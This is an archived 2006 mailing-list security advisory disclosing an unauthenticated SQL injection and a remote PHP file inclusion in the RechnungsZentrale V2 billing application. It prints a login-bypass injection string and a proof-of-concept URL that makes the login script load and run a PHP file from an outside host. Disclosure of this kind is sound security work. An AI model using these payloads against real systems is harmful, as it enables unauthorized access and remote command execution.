lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060419074003.20967.qmail@securityfocus.com>
Date: 19 Apr 2006 07:40:03 -0000
From: info@....org
To: bugtraq@...urityfocus.com
Subject: RechnungsZentrale V2 - SQL injection and Remote PHP inclusion
 vulnerabilities


    ----------------------------------------------------------------------------------
    - GroundZero Security Research and Software Development 2006                     - 
    ----------------------------------------------------------------------------------
    -                                                                                -
    -  Security Advisory regarding RechnungsZentrale v2.                             -
    -  SQL Injection and Remote File inclusion Vulnerabilities.                      -
    -  Released: Tue Apr 18 18:00:00 CEST 2006                                       -
    -                                                                                -
    ----------------------------------------------------------------------------------



    ----------------------------------------------------------------------------------
    - Affected:                                                                      -
    ----------------------------------------------------------------------------------

    Software:	RechnungsZentrale V2
    Version:	1.1.3, likely older versions are affected aswell.
    Vendor: 	http://www.nfec.de/


    ----------------------------------------------------------------------------------
    - Information:                                                                   -
    ----------------------------------------------------------------------------------

    "RechnungsZentrale V2 is a multiuser, Web-based billing application. 
     It facilitates the creation of bills and the management of customers. 
     It is written in PHP and uses MySQL. It supports German, English, French, 
     and Dansk languages."

    The Software contains vulnerabilities which allow an Attacker to conduct
    SQL injection and Remote File inclusion Attacks prior to Authentication.

    The SQL injection vulnerabilitie exists in the login script (authent.php4) and 
    allows an Attacker to log into the internal Interface or execute malicious 
    SQL commands.

    PoC:
    	User: ' OR '1'='1
    	Password: 1


    In the same script it is possible to include a remote php by pointing the 
    "rootpath=" option to a remote PHP script with a system() or passthru() function.
   
    Doing so would allow an unauthenticated Attacker to execute shell commands with 
    permissions of the Web Server. 

    PoC: 
	http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4


    ----------------------------------------------------------------------------------
    - Vendor Response:                                                               -
    ----------------------------------------------------------------------------------

    Notified: 	Tue Apr 18 16:12:14 CEST 2006
    Response: 	Tue Apr 18 17:13:14 CEST 2006 
	      	(Development Discontinued)
    Disclosure:	Tue Apr 18 18:00:00 CEST 2006


    ----------------------------------------------------------------------------------
    - Bugs discovered by GroundZero Security Research and Software Development       -
    - http://www.GroundZero-Security.com | Http://www.g-0.org                        -
    ----------------------------------------------------------------------------------


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ